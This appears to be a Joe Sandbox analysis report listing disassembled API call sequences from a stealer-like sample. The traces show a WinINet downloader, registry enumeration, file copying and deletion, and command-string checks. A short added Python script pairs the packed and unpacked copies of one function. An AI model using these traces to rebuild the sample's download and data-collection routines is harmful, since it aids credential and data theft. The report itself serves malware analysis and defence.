                                                              • Part of subcall function 022D7537: HeapFree.KERNEL32(00000000), ref: 022D76C0
                                                            • lstrcat.KERNEL32(0064A668,004217FC), ref: 022D786D
                                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78AF
                                                            • lstrcat.KERNEL32(0064A668,00421800), ref: 022D78C1
                                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 022D78F6
                                                            • lstrcat.KERNEL32(0064A668,00421804), ref: 022D7907
                                                            • lstrcat.KERNEL32(0064A668,00000000), ref: 022D793A
                                                            • lstrcat.KERNEL32(0064A668,00421808), ref: 022D7954
                                                            • task.LIBCPMTD ref: 022D7962
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                                            • String ID:
                                                            • API String ID: 2677904052-0
                                                            • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                            • Instruction ID: cf4a7821771cdac8e22ca8d66d6d36e0a275f20a70a445ebae946f91aeec6ae1
                                                            • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                                            • Instruction Fuzzy Hash: 3F314FB6A50209EFCB04EBE0DC94DFE7776EB49301F105018E106A7294DA34E942CF52
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                                            • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                                            • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                                            • InternetCloseHandle.WININET(?), ref: 004050C6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                             • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                                            • String ID:
                                                            • API String ID: 3894370878-0
                                                            • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                            • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                            • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                            • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022D5231
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D5238
                                                            • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022D5251
                                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022D5278
                                                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022D52A8
                                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 022D52F1
                                                            • InternetCloseHandle.WININET(?), ref: 022D5320
                                                            • InternetCloseHandle.WININET(?), ref: 022D532D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                            • String ID:
                                                            • API String ID: 1008454911-0
                                                            • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                            • Instruction ID: ee2c64580d4dec94019297141c0432774384836935dac6d87814800b00e75967
                                                            • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                                            • Instruction Fuzzy Hash: 0A31F9B4A40218ABDB20CF94DC89BDCB7B5EB48704F5081D9F609A7284D7B46AC5CF59
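The two preceding blocks are the same downloader (GetProcessHeap + heap allocation of 0x05F5E0FF = 99,999,999 bytes, InternetOpenA, InternetOpenUrlA with flags 0x04000100 = INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE, a 0x400-byte InternetReadFile loop, memcpy, two InternetCloseHandle calls) disassembled twice: once in the on-disk image at 00400000 ("based on PE: true") and once in the unpacked region at 022D0000 ("based on PE: false"). Added example, not part of the report: a Python script that parses the two "APIs" lists as printed on this page, checks that they call the same APIs in the same order (folding HeapAlloc and its ntdll forwarder RtlAllocateHeap), computes the constant offset between twin call sites, and lists argument values both copies still take from the original image. The image address range it treats as "on-disk image" is an assumption taken from the dump offsets on this page.

```python
"""Pair the two copies of one function that this report disassembles: the
on-disk image (00400000, 'based on PE: true') and the unpacked region
(022D0000, 'based on PE: false'). Added example, not part of the report;
REGION_PE and REGION_UNPACKED are the two InternetOpenUrlA 'APIs' lists
from this page copied verbatim."""
import re
from typing import Any, Dict, List, Optional, Tuple

Call = Dict[str, Any]

# One bullet of a Joe Sandbox "APIs" list, with or without an argument list:
#   • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
#   • memset.MSVCRT ref: 022E5192
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# kernel32!HeapAlloc/HeapFree forward to ntdll!RtlAllocateHeap/RtlFreeHeap;
# the two dumps name the same call differently, so fold them for comparison.
ALIASES = {"RtlAllocateHeap": "HeapAlloc", "RtlFreeHeap": "HeapFree"}

# Assumption: the on-disk image occupies 00400000-006FFFFF (its dump segments
# on this page run from 00400000 to 0065C000).
IMAGE_LO, IMAGE_HI = 0x400000, 0x700000

REGION_PE = """
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
• HeapAlloc.KERNEL32(00000000), ref: 00404FD1
• InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
• InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
• memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
• InternetCloseHandle.WININET(00415EDB), ref: 004050B9
• InternetCloseHandle.WININET(?), ref: 004050C6
"""

REGION_UNPACKED = """
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022D5231
• RtlAllocateHeap.NTDLL(00000000), ref: 022D5238
• InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022D5251
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022D5278
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 022D52A8
• memcpy.MSVCRT(00000000,?,00000001), ref: 022D52F1
• InternetCloseHandle.WININET(?), ref: 022D5320
• InternetCloseHandle.WININET(?), ref: 022D532D
"""


def parse_trace(text: str) -> List[Call]:
    """Direct calls only; 'Part of subcall function' bullets belong to callees."""
    calls: List[Call] = []
    for line in text.splitlines():
        if "Part of subcall function" in line:
            continue
        m = LINE_RE.search(line)
        if m:
            args = m.group("args")
            calls.append({
                "api": m.group("api"),
                "module": m.group("module"),
                "args": args.split(",") if args else [],
                "ref": int(m.group("ref"), 16),
            })
    return calls


def api_sequence(calls: List[Call]) -> Tuple[str, ...]:
    return tuple(ALIASES.get(c["api"], c["api"]) for c in calls)


def relocation_delta(a: List[Call], b: List[Call]) -> Optional[int]:
    """Constant offset between twin call sites, or None if the API order
    differs or the offset is not the same for every call."""
    if not a or api_sequence(a) != api_sequence(b):
        return None
    deltas = {y["ref"] - x["ref"] for x, y in zip(a, b)}
    return deltas.pop() if len(deltas) == 1 else None


def shared_image_pointers(a: List[Call], b: List[Call]) -> List[str]:
    """Arguments identical in both copies that point into the on-disk image:
    strings or globals the unpacked code still reads from the original image."""
    hits: List[str] = []
    for x, y in zip(a, b):
        for p, q in zip(x["args"], y["args"]):
            if p == q and re.fullmatch(r"[0-9A-Fa-f]{8}", p) and IMAGE_LO <= int(p, 16) < IMAGE_HI:
                hits.append(p)
    return hits


if __name__ == "__main__":
    pe, un = parse_trace(REGION_PE), parse_trace(REGION_UNPACKED)
    print(hex(relocation_delta(pe, un) or 0), shared_image_pointers(pe, un))
```

On these two lists the offset comes out as 0x01ED0267 for every call site, not the bare 0x01ED0000 difference between the two dump bases, so the unpacked copy is a relocated function body rather than the image re-mapped at a new base; the InternetOpenA user-agent pointer 00420DDF is the one argument both copies share, and it still lives in the original image, which is why dumping only the 022D0000 region loses that string.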
                                                            APIs
                                                              • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                                              • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022E58AB
                                                            • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022E5908
                                                            • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022E5ABE
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022E548F
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022E557F
                                                              • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5596
                                                              • Part of subcall function 022E5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022E55CB
                                                              • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E55EA
                                                              • Part of subcall function 022E5527: strtok.MSVCRT(00000000,?), ref: 022E5605
                                                              • Part of subcall function 022E5527: lstrlen.KERNEL32(00000000), ref: 022E5615
                                                            • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022E59F2
                                                            • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022E5BA7
                                                            • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022E5C73
                                                            • Sleep.KERNEL32(0000EA60), ref: 022E5C82
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpylstrlen$Sleepstrtok
                                                            • String ID:
                                                            • API String ID: 3630751533-0
                                                            • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                            • Instruction ID: e0dad19829b9998260d0b21101c0b68568d91499336cf093027f9cc691bbf922
                                                            • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                            • Instruction Fuzzy Hash: FFE1FA71920304AACF18FBE0DD969FD737AAF65300FC08168A50766298EF785B58DF91
                                                            APIs
                                                            • memset.MSVCRT ref: 022D158E
                                                              • Part of subcall function 022D1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                                              • Part of subcall function 022D1507: RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                                              • Part of subcall function 022D1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                                              • Part of subcall function 022D1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                                              • Part of subcall function 022D1507: RegCloseKey.ADVAPI32(?), ref: 022D1566
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022D15B6
                                                            • lstrlen.KERNEL32(?), ref: 022D15C3
                                                            • lstrcat.KERNEL32(?,004262EC), ref: 022D15DE
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                              • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                                              • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                                              • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022D16CC
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022D9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022D9C53
                                                              • Part of subcall function 022D9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022D9C78
                                                              • Part of subcall function 022D9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022D9C98
                                                              • Part of subcall function 022D9C27: ReadFile.KERNEL32(000000FF,?,00000000,022D16F6,00000000), ref: 022D9CC1
                                                              • Part of subcall function 022D9C27: LocalFree.KERNEL32(022D16F6), ref: 022D9CF7
                                                              • Part of subcall function 022D9C27: CloseHandle.KERNEL32(000000FF), ref: 022D9D01
                                                            • DeleteFileA.KERNEL32(00000000), ref: 022D1756
                                                            • memset.MSVCRT ref: 022D177D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                            • String ID:
                                                            • API String ID: 3885987321-0
                                                            • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                            • Instruction ID: fb8d6179fda7bab45180705094579d78368cd3d266ec192a883a346b33f76260
                                                            • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                            • Instruction Fuzzy Hash: 8F515EB19603199BCF15FBA0DD91EED737EAF54300F8041A8A60B62194EF345B89CFA5
                                                            APIs
                                                            • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00876340,?,0042110C,?,00000000,?), ref: 0041696C
                                                            • sscanf.NTDLL ref: 00416999
                                                            • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00876340,?,0042110C), ref: 004169B2
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00876340,?,0042110C), ref: 004169C0
                                                            • ExitProcess.KERNEL32 ref: 004169DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$System$File$ExitProcesssscanf
                                                            • String ID: B
                                                            • API String ID: 2533653975-2248957098
                                                            • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                            • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                            • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                            • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                            APIs
                                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                            • wsprintfA.USER32 ref: 00418459
                                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            • RegQueryValueExA.ADVAPI32(00000000,00879648,00000000,000F003F,?,00000400), ref: 004184EC
                                                            • lstrlenA.KERNEL32(?), ref: 00418501
                                                            • RegQueryValueExA.ADVAPI32(00000000,00879798,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                            • String ID: %s\%s
                                                            • API String ID: 3896182533-4073750446
                                                            • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                            • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                            • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                            • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A51
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A68
                                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022D4A7F
                                                            • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022D4AA0
                                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 022D4AB0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??2@$CrackInternetlstrlen
                                                            • String ID: <
                                                            • API String ID: 1683549937-4251816714
                                                            • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                            • Instruction ID: 0ebf7afa77a7499f55e7d8a0e3a91045032743aa6deee66afbcbfd2db8279f76
                                                            • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                            • Instruction Fuzzy Hash: DF215BB5D00219ABDF10DFA4E848AED7B75FF44320F008225F925A7290EB706A05CF91
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                            • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00873040,00000000,00020119,00000000), ref: 004176DD
                                                            • RegQueryValueExA.ADVAPI32(00000000,00879768,00000000,00000000,?,000000FF), ref: 004176FE
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID: Windows 11
                                                            • API String ID: 3466090806-2517555085
                                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E790B
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7912
                                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 022E7944
                                                            • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 022E7965
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 022E796F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID: Windows 11
                                                            • API String ID: 3225020163-2517555085
                                                            • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction ID: abc0e968c0233fa8e894c544106124b9d0fc15a27f8f0594f8b23556f590e95e
                                                            • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                            • Instruction Fuzzy Hash: A0012CB9A80205BBEB10DBE0ED49FADB7B9EB48701F405154FA0597284D6749900DB51
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00873040,00000000,00020119,004176B9), ref: 0041775B
                                                            • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                            • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID: CurrentBuildNumber
                                                            • API String ID: 3466090806-1022791448
                                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                            APIs
                                                            • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                            • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                            • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleSize
                                                            • String ID: :A$:A
                                                            • API String ID: 1378416451-1974578005
                                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                            • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                            • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022D75A1
                                                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022D7618
                                                            • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022D7674
                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 022D76B9
                                                            • HeapFree.KERNEL32(00000000), ref: 022D76C0
                                                              • Part of subcall function 022D94A7: vsprintf_s.MSVCRT ref: 022D94C2
                                                            • task.LIBCPMTD ref: 022D77BC
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
